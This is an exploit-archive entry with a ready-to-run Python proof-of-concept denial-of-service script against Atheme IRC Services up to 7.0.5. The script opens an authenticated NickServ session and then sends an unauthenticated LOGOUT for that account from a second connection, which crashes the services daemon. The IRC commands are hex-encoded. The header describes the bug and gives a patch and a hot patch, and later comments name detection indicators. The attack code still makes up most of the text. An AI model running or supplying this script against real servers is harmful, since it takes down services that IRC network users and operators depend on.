Atheme IRC Services 7.0.5 Denial Of Service



EKU-ID: 2967 CVE: OSVDB-ID:
Author: Apetrick Published: 2013-01-21 Verified: Verified


#!/usr/bin/python3
###################################################################################
#                                                          Monday, January 13, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#                
#
#                      -=[ Atheme - IRC Services Daemon ] =-
#          
#                    [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
#  O_O 	    .....> Sent To Play All Alone <3
#  UberLame .....> For Providing More Sweet, Sweet Cycles
#  Aph3x    .....> For Being Awesome
#  Apetrick .....> For Not Letting Me Play With Him
#
###################################################################################
#
#  ~~! SHOUT OUTS !~~
#
#  	a		heyoz		Eurydemus
#	nikka		l1nd		BinaryTENSHi
#	syk		Gatsby
#
#  ~~! Special Thanks !~~
#
#	Packet Storm Security (www.packetstormsecurity.com) for archiving our
#	concepts in order to help secure and educate those who read them.
#
###################################################################################
#  SUMMARY     #
################
#
# Bug Fix: [12/20/12]: https://github.com/atheme/atheme/commit/1aaa9e8f1d0b0b67b36c2a6318c71beaa7f39194
#
#	An improper implementation of the LOGOUT command results in a segfault
# when an unauthenticated user tries to log out (deauthenticate) another,
# authenticated user.
#
################
#  VULNERABLE  #
################
#
# 	Atheme Services up to 7.0.5 [and with logout.c loaded (by default)]
#
################
#  CVE         #
################
#
#       [ No CVE Has Been Reported ]
#
################
#  PATCH       #
################ 
#
#	- Proper Fix
#	       - Update To Current Version From GitHub 
#
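#	- Hot Patch
#	       - Unload nickserv/logout
#       	        > /quote operserv modunload nickserv/logout
#			$ !services.global! Module nickserv/logout unloaded.
#			$ -OperServ- Module nickserv/logout unloaded.
#	       - Note: this unloads the module from the running services only and
#	         makes LOGOUT unavailable; presumably the module is loaded again
#	         from the services configuration on restart, so disable it there
#	         as well until the upgrade is applied.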
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Nickname, Password and Optionally the Port, and the
# script will deliver the staged payload...
#
# [!USE/]$ ./<file>.py -t <server> -P <port> -n <nickname> -p <password> 
#
###################################################################################
from argparse import ArgumentParser
import socket

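def toHex( string_data ):
        """Return *string_data* as lowercase hex, exactly two digits per character.

        The result is meant to be spliced into the hex templates that the
        callers pass to bytes.fromhex(), so every character must map to one
        byte. Code points below 0x10 are zero-padded; the unpadded form would
        leave an odd number of digits and corrupt or break the decode.

        Raises:
            UnicodeEncodeError: (a ValueError subclass) if a character does
                not fit in a single byte, i.e. its code point is above 0xFF.
        """
        # latin-1 maps code points 0x00-0xFF one-to-one onto bytes, which keeps
        # the output identical to the old per-character hex() for 0x10-0xFF.
        return string_data.encode( 'latin-1' ).hex()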

def deploy( sock, target, port, nick, passwd ):
        """Open the second connection and send the NickServ LOGOUT request.

        This connection registers under a fixed nickname and never identifies
        to NickServ, so the LOGOUT it sends comes from an unauthenticated
        client and names another account (nick). That is the condition the
        file header describes as crashing services up to 7.0.5 while
        nickserv/logout is loaded.

        Args:
            sock: unconnected TCP socket used for this session.
            target: IRC server host.
            port: port number; converted with int() before connecting.
            nick: account name placed in the LOGOUT request.
            passwd: password placed in the LOGOUT request.

        Returns:
            The result of sock.close() (None for a standard socket).

        The nickname and USER line are fixed in the code, which makes them
        usable as log or IDS indicators: nickname "_zemp0day_", USER
        parameters "zemp0day HEHE HEHE :ohai <3".
        """
        try:
                sock.connect(( target, int( port ) ))
        except:
                # Bare except: any failure (including a non-numeric port) ends
                # the whole process here.
                print( "\t[-] Payload Deployment Failed!" )
                exit()

        # Decodes to: NICK _zemp0day_ CRLF
        sock.send( b'\x4e\x49\x43\x4b\x20\x5f\x7a\x65\x6d\x70\x30\x64\x61\x79\x5f\x0d\x0a' )
        # Decodes to: USER zemp0day HEHE HEHE :ohai <3 CRLF
        sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45' + \
		   b'\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20\x3c\x33' + \
		   b'\x0d\x0a' )

        # NOTE(review): the only way out of this loop is a chunk containing
        # ' 396 '; a closed connection (empty recv) is not detected.
        while True:
                # str() of a bytes object yields its repr ("b'...'"); the
                # substring test below runs against that text.
                host_data = str( sock.recv(4096).strip() )

                # Numeric 396 is treated as the sign that the server accepted
                # the connection (presumably the hidden-host notice; confirm
                # for the ircd in use).
                if ' 396 ' in host_data:
                        # Template decodes to: PRIVMSG NICKSERV :LOGOUT <nick> <passwd> CRLF
                        sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4c4f474f555420{}20{}0d0a'.format( \
                                   toHex( nick ), toHex( passwd ) ) ) )

                        print( '\t[+] Payload Deployed! <3' )
                        break


        # Decodes to: QUIT CRLF
        sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
        return sock.close()

def stage( target, port, nick, passwd ):
        """Create the authenticated session, then hand over to deploy().

        The first connection registers *nick* with NickServ and identifies to
        it. While that session is still open, deploy() is called on a second
        socket; the first connection sends QUIT only after deploy() returns.

        Args:
            target: IRC server host.
            port: port number; converted with int() before connecting.
            nick: nickname used on this connection and registered with NickServ.
            passwd: password used for REGISTER and IDENTIFY.

        Fixed strings visible on the wire (usable as log or IDS indicators):
        USER parameters "zemp0day HEHE HEHE :ohai <3" and the registration
        e-mail address "devs@zempirians.com".
        """
        sock   = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
        # Second socket, passed unconnected to deploy().
        p_sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )

        try:
                sock.connect(( target, int( port ) ))
        except:
                # Bare except: any failure (including a non-numeric port) ends
                # the whole process here.
                print( "[-] Failed To Connect To {}".format( target ) )
                exit()

        # Template decodes to: NICK <nick> CRLF
        sock.send( bytes.fromhex( '4e49434b20{}0d0a'.format( toHex( nick ) ) ) )
        # Decodes to: USER zemp0day HEHE HEHE :ohai <3 CRLF
        sock.send( b'\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48' + \
                   b'\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x6f\x68\x61\x69\x20' + \
                   b'\x3c\x33\x0d\x0a' )

        # NOTE(review): the only way out of this loop is a chunk containing
        # ' 396 '; a closed connection (empty recv) is not detected.
        while True:
                # str() of a bytes object yields its repr ("b'...'"); the
                # checks below run against that text.
                host_data = str( sock.recv( 8096 ).strip() )

                # Numeric 396 is treated as the sign that the server accepted
                # the connection (presumably the hidden-host notice; confirm
                # for the ircd in use).
                if ' 396 ' in host_data:
                        # Decodes to: PRIVMSG NICKSERV :REGISTER <passwd> devs@zempirians.com CRLF CRLF
                        # (.format() applies to the second literal only, which holds the placeholder.)
                        sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a524547495354455220' + \
                                    '{}2064657673407a656d70697269616e732e636f6d0d0a0d0a'.format( toHex( passwd ) ) ) )

                        # Decodes to: PRIVMSG NICKSERV :IDENTIFY <passwd> CRLF
                        sock.send( bytes.fromhex( '505249564d5347204e49434b53455256203a4944454e5449465920{}0d0a'.format( toHex( passwd ) ) ) )

                        print( '\t[+] Staging Successful, Deploying Payload Against Target {}'.format( target ) )
                        # Runs the second connection to completion before this
                        # one sends QUIT below.
                        deploy( p_sock, target, port, nick, passwd )
                        break

                # Best-effort PING handling. NOTE(review): nothing here checks
                # that a PONG was sent, and the bare except discards every
                # error raised in this block.
                try:
                        msg = host_data.split()
                        if msg[0].lower() is 'ping':
                                sock.send( b"PONG {}\r\n".format( msg[1] ) )
                except:
                        pass

        # Decodes to: QUIT CRLF
        sock.send( b'\x51\x55\x49\x54\x0d\x0a' )
        sock.close()


if __name__ == '__main__':
        # Command-line front end: collect the server, port, nickname and
        # password, then pass them to stage().
        cli = ArgumentParser( description='#legion Atheme IRC Services DoS' )

        # ( flags, keyword settings ) for each option, registered in this order.
        option_table = (
                ( ( '-t', '--target' ), dict( dest='target', help='IRCD Server To Connect On' ) ),
                ( ( '-P', '--port' ), dict( dest='port', default=6667, help='Port To Connect On' ) ),
                ( ( '-n', '--nick' ), dict( dest='nick', default='zemp0day', help='Nick To Use' ) ),
                ( ( '-p', '--pass' ), dict( dest='passwd', default='yad0pmez', help='Password To Use' ) ),
        )
        for flags, settings in option_table:
                cli.add_argument( *flags, **settings )

        opts = cli.parse_args()

        if opts.target is not None:
                stage( opts.target, opts.port, opts.nick, opts.passwd )
        else:
                # Without a target there is nothing to do: show usage and stop.
                cli.print_help()
                exit()